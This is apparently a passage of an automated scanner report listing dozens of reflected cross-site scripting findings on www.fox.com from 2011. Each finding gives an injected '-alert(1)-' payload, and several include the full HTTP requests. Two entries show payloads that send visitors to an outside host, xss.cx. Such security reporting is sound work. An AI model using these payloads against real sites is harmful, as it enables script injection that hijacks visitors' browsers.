This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5520"-alert(1)-"c507a22771b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f71f"-alert(1)-"b7a430e1a5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54d72"-alert(1)-"8631be47365 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6083f"-alert(1)-"36848e2e2e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26b21"-alert(1)-"020a48b7a0a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6c71"-alert(1)-"0a41ec00552 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_uie6c71"-alert(1)-"0a41ec00552/css/combinedcss.php?page=fox.homepage HTTP/1.1 Host: www.fox.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://www.fox.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache X-FarmName: www.fox.com X-FarmAddr: 10.96.57.114 Content-Type: text/html; charset=utf-8 Content-Length: 22174 Cache-Control: max-age=3600 Date: Sun, 02 Oct 2011 22:59:02 GMT Connection: close Vary: Accept-Encoding
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd487"-alert(1)-"eaa6166238c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_ui/cssdd487"-alert(1)-"eaa6166238c/combinedcss.php?page=fox.homepage HTTP/1.1 Host: www.fox.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://www.fox.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache X-FarmName: www.fox.com X-FarmAddr: 10.96.57.115 Content-Type: text/html; charset=utf-8 Content-Length: 22146 Cache-Control: max-age=3600 Date: Sun, 02 Oct 2011 22:59:07 GMT Connection: close Vary: Accept-Encoding
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29019"-alert(1)-"b8f967f530a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7b3a"-alert(1)-"eaf96df47c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa8ab"-alert(1)-"8b32fbdd5c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44e20"-alert(1)-"0b1a5a5f8f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edc0e"-alert(1)-"82188488666 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80c7a"-alert(1)-"06df9c9be7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4078"-alert(1)-"68c87225648 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd4ce"-alert(1)-"5577958729 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce750"-alert(1)-"20611a4ed72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7db3"-alert(1)-"c57217a35f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a97a5"-alert(1)-"52e55e816b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5720"-alert(1)-"78047514c7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f81b1"-alert(1)-"99f5496527 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60700"-alert(1)-"2d10ecc9658 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6750"-alert(1)-"fe038b27593 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a871"-alert(1)-"e5d9947b15d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 175c3"-alert(1)-"c8766271a5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87182"-alert(1)-"e3a19d2d90d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0837"-alert(1)-"8f1c4dbff1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b69c9"-alert(1)-"1ffaeaf684d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82a36"-alert(1)-"8535eeb0e17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd22"-alert(1)-"0a8d0234e24 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 483f9"-alert(1)-"f82465dc35c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 211cd"-alert(1)-"d6ea2d832a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26aae"-alert(1)-"ed30504e3ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1654d"-alert(1)-"b5c3130e73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c23ae"-alert(1)-"31104e0facb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bceaf"-alert(1)-"d4d393f6c15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c78ff"-alert(1)-"da482a500b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb284"-alert(1)-"57851b34756 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ce4b"-alert(1)-"de8cf054805 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2144a"-alert(1)-"3077cfb82ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17c82"-alert(1)-"2f0bc416e19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18940"-alert(1)-"54fe87175c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1e8b"-alert(1)-"22097ce8d71 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75260"-alert(1)-"dae9b21bf6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7088"-alert(1)-"0abab8d3844 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed381"-alert(1)-"bda88077d1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d101"-alert(1)-"de22bde193b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66704"-alert(1)-"19baaf36eac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86dee"-alert(1)-"d9f655f316f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86547"-alert(1)-"958c411b368 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea0a"-alert(1)-"35014117d04 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb0d4"-alert(1)-"3a1020ca558 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17bbd"-alert(1)-"8da2983ce23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d07de"-alert(1)-"295a0b9dd3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43757"-alert(1)-"46ed0a637af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.222. http://www.fox.com/_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48283"-alert(1)-"becba50b315 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70321"-alert(1)-"cac5fde1d79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f56e"-alert(1)-"83cf35fb6ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb967"-alert(1)-"6467b81c6be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.226. http://www.fox.com/_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7639"-alert(1)-"30c9c963ceb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 226e3"-alert(1)-"ddef4291199 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_ui226e3"-alert(1)-"ddef4291199/js/combinedjs.php?page=tracking HTTP/1.1 Host: www.fox.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.fox.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache X-FarmName: www.fox.com X-FarmAddr: 10.96.57.116 Content-Type: text/html; charset=utf-8 Content-Length: 22164 Cache-Control: max-age=3600 Date: Sun, 02 Oct 2011 22:59:50 GMT Connection: close Vary: Accept-Encoding
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73e68"-alert(1)-"46af491a7a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_ui/js73e68"-alert(1)-"46af491a7a0/combinedjs.php?page=tracking HTTP/1.1 Host: www.fox.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.fox.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache X-FarmName: www.fox.com X-FarmAddr: 10.96.57.118 Content-Type: text/html; charset=utf-8 Content-Length: 22136 Cache-Control: max-age=3600 Date: Sun, 02 Oct 2011 22:59:55 GMT Connection: close Vary: Accept-Encoding
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f36c"-alert(1)-"7498cf41b06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_ui7f36c"-alert(1)-"7498cf41b06/js/fox_homepage_vars.php?date= HTTP/1.1 Host: www.fox.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.fox.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache X-FarmName: www.fox.com X-FarmAddr: 10.96.57.113 Content-Type: text/html; charset=utf-8 Content-Length: 22199 Cache-Control: max-age=3600 Date: Sun, 02 Oct 2011 22:58:59 GMT Connection: close Vary: Accept-Encoding
